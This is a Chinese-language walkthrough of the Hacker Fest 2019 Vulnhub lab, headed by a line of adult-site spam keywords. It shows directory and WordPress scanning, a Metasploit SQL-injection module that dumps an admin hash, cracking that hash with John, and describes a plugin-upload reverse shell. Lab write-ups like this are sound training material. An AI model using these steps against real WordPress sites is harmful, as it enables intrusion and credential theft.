午夜视频在线网站,日韩视频精品在线,中文字幕精品一区二区三区在线,在线播放精品,1024你懂我懂的旧版人,欧美日韩一级黄色片,一区二区三区在线观看视频

分享

Hacker Fest: 2019 Vulnhub Walkthrough

 Coder編程 2021-12-02

靶機地址:

https://www./entry/hacker-fest-2019,378/

主機掃描:

 

FTP嘗試匿名登錄

 

應(yīng)該是WordPress的站點

進行目錄掃描:

python3 dirsearch.py http://10.10.203.17/ -e html,json,php

 

此外還有一個phpmyadmin

http://10.10.203.17/phpmyadmin/index.php

使用wpscan掃描檢測插件漏洞

wpscan --url http://10.10.203.17

 

msf5 > use auxiliary/admin/http/wp_google_maps_sqli

msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 10.10.203.17
rhosts => 10.10.203.17

msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit
[*] Running module against 10.10.203.17

[*] 10.10.203.17:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20191014174707_default_10.10.203.17_wp_google_maps.j_470411.bin
[+] 10.10.203.17:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 webmaster@none.local
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_google_maps_sqli) >

 

密碼hash破解

john --wordlist=/usr/share/wordlists/rockyou.txt hash

kittykat1

 

http://10.10.203.17/wp-admin/

安裝ubh插件,進行上傳文件

 

本地監(jiān)聽,訪問反彈shell

這里有兩個思路:

1是通過webshell切換到webmaster用戶

2是直接通過遠程ssh登錄系統(tǒng)

 

進行提權(quán)

 

OVER!

 

    本站是提供個人知識管理的網(wǎng)絡(luò)存儲空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點。請注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購買等信息,謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點擊一鍵舉報。
    轉(zhuǎn)藏 分享 獻花(0

    0條評論

    發(fā)表

    請遵守用戶 評論公約

    類似文章 更多